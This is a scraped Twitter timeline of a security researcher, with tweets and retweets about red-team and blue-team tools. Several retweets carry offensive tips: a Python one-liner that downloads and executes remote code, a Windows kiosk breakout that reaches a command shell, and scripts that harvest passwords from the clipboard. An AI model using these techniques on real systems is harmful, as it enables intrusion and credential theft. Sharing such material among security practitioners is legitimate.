Carrie Roberts

@OrOneEqualsOne

Red Teamer turned Blue, Infosec, GSE

Joined October 2014

Tweets

  1. Pinned Tweet
    Dec 1, 2016

    I'm sharing a helpful tool I developed for reporting on password usage in a Windows domain, webcast coming soon:

  2. Retweeted

    It was my pleasure to work on this with and , two excellent analysts. Malware analysis provided by the awesome .

  3. Retweeted

    I'll always miss people here, because the industry is filled with awesome analysts/researchers. and as well. Sorry to any I missed. It is not intentional.

  4. Retweeted

    Crap! I forgot , author of IRIS-H (referenced in the blog). If you haven't experienced the joy of using his document forensic tool, please try it! There is nothing else like it.

  5. Retweeted
    Jan 27

    Complexity impresses your peers. Clarity impresses your customers.

  6. Feb 3

    Wow, I've been wanting this for a long time. Nice job!

  7. Retweeted
    Feb 3
    Replying to

    Nice work Jan, thank you for sharing! My colleague did an extensive write-up on this style of maldoc technique, it's definitely a weird interaction.

  8. Retweeted
    Jan 28

    Just published my latest blog titled (Ab)using Kerberos from Linux, which covers common Kerberos abuse vectors, as well as how to exploit them from Linux using Impacket. Check it out here:

  9. Retweeted
    Jan 27

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

  10. Retweeted
    Jan 27

    New week new opportunities! I threw together a pair of scripts to monitor the clipboard on Windows and macOS to gather passwords from password managers. Make it an awesome week!

  11. Retweeted
    Jan 26
    Replying to
  12. Jan 24

    Just enjoyed listening to on the InfoSec Career Podcast with . It was encouraging, entertaining and full of good advice. Thanks!

  13. Retweeted
    Jan 24

    Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("");exec(())' Let me know if anyone has a better way to do it, but this seems to work.

  14. Retweeted
    Jan 22

    Revisiting RDP lateral movement and releasing a project that will be part of a bigger tool coming next week

  15. Retweeted
    Jan 18

    Okay here it is, Zipper a new file and folder compression utility for CobaltStrike. Blue Teams/Hunters/Defenders: Look out for non file-compression related processes creating (random named) zipfiles within temp folders.

  16. Retweeted
    Jan 15
  17. Retweeted
    Jan 14

    On behalf of the entire Atomic Red Team community, we are incredibly thankful for the contributions! And special thanks to for taking on the added responsibility of serving as a maintainer. The first to hail from beyond the nest! ❤️💙

  18. Retweeted
    Jan 10

    Recently I was on a pentest and needed to manage Active Directory groups from Linux to achieve privilege escalation. If you find yourself in a similar scenario, this is what you can do:

  19. Jan 7

    I have a 19yo daughter in web dev, she is taking a web pentesting class. She just came in my office all jazzed up about session fixation and wanted to confirm with me it really works that way. As she walked out of my office she said "and that's why you don't click on links!" LOL

  20. Retweeted
    Dec 3, 2019

    0.55 is finally out, just in time for ! Main changes: olevba += SLK file parser and XLM macro extraction, VBA stomping detection More info: How to install/update: pip install -U oletools

  21. Retweeted
    Nov 13, 2019